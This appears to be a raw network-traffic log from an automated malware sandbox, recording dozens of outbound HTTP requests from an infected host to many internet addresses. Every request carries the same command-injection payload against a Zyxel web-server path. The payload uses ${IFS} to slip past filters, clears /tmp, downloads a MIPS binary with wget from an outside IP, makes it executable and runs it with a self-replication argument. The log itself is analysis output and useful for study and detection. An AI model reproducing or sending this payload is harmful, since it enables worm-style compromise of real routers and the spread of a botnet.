                                      Jan 19, 2024 17:28:47.297497034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      211192.168.2.1457520105.54.158.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:47.297507048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      212192.168.2.144485694.106.215.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301069975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      213192.168.2.145870089.93.17.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301136971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      214192.168.2.1438024185.144.206.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301139116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      215192.168.2.1460084133.138.171.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301158905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      216192.168.2.1460470158.72.255.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301223993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      217192.168.2.144963841.203.126.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301238060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      218192.168.2.144976090.11.84.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301302910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      219192.168.2.143769083.136.43.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301317930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      220192.168.2.143936063.26.93.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301361084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      221192.168.2.1455376209.77.220.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301381111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      222192.168.2.1449422124.110.113.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301409960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      223192.168.2.1446532143.168.8.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301440001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      224192.168.2.143485267.104.233.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301445007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      225192.168.2.143512041.94.237.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301490068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      226192.168.2.1433980135.214.124.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301557064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      227192.168.2.144331864.79.135.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301578999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      228192.168.2.1452784208.235.242.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301603079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      229192.168.2.143886638.92.198.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301645041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      230192.168.2.145139452.233.108.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301892042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      231192.168.2.1446432212.72.122.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301928997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      232192.168.2.1449272108.83.177.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:48.301944971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      233192.168.2.143809481.101.11.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:49.305283070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      234192.168.2.1459206168.247.56.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:49.305305004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      235192.168.2.1454320113.101.171.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:49.305341005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      236192.168.2.1436378155.243.137.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:49.305372953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      237192.168.2.1459466216.132.160.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:49.305453062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      238192.168.2.1457208105.228.87.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:50.310287952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      239192.168.2.1444062150.156.18.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:50.310342073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      240192.168.2.143374071.120.206.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:50.310405016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      241192.168.2.1447900171.8.141.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:50.310483932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      242192.168.2.1443344213.110.14.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:50.310518026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      243192.168.2.1438708196.80.185.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:50.310590982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      244192.168.2.145854440.4.253.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:50.310772896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      245192.168.2.145278093.213.7.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:50.310827971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      246192.168.2.144038663.184.223.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:51.316922903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      247192.168.2.1445256198.85.57.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:52.319879055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      248192.168.2.1449192196.205.86.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:52.319881916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      249192.168.2.143741449.199.114.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:52.319910049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      250192.168.2.143592625.2.23.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:52.319928885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      251192.168.2.143765018.7.99.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:52.319967031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      252192.168.2.1445528113.137.146.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:52.319998026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      253192.168.2.143873872.64.84.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:52.320024967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      254192.168.2.143963262.221.58.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:52.320044041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      255192.168.2.14471669.162.251.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:52.320139885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      256192.168.2.1448258121.52.125.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:52.320163012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      257192.168.2.14602141.107.165.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:52.320218086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      258192.168.2.144374427.241.161.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:53.323782921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      259192.168.2.1434800119.210.224.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.327336073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      260192.168.2.144491032.196.158.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.327364922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      261192.168.2.14467144.116.117.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.327394962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      262192.168.2.1437620185.175.248.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.327420950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      263192.168.2.1452514123.52.44.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.327467918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      264192.168.2.1447990143.109.126.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.327501059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      265192.168.2.144685685.134.243.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.327552080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      266192.168.2.1453700187.172.34.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.327600956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      267192.168.2.144590234.34.125.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.327614069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      268192.168.2.1444478205.89.61.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.327646017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      269192.168.2.143286086.53.181.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.327701092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      270192.168.2.1454248196.72.203.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.327723980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      271192.168.2.143471850.13.191.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.327760935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      272192.168.2.1445908150.11.236.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.327790022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      273192.168.2.143428435.76.157.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:54.327832937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      274192.168.2.144482444.185.92.80443
                                      TimestampBytes transferredDirectionData
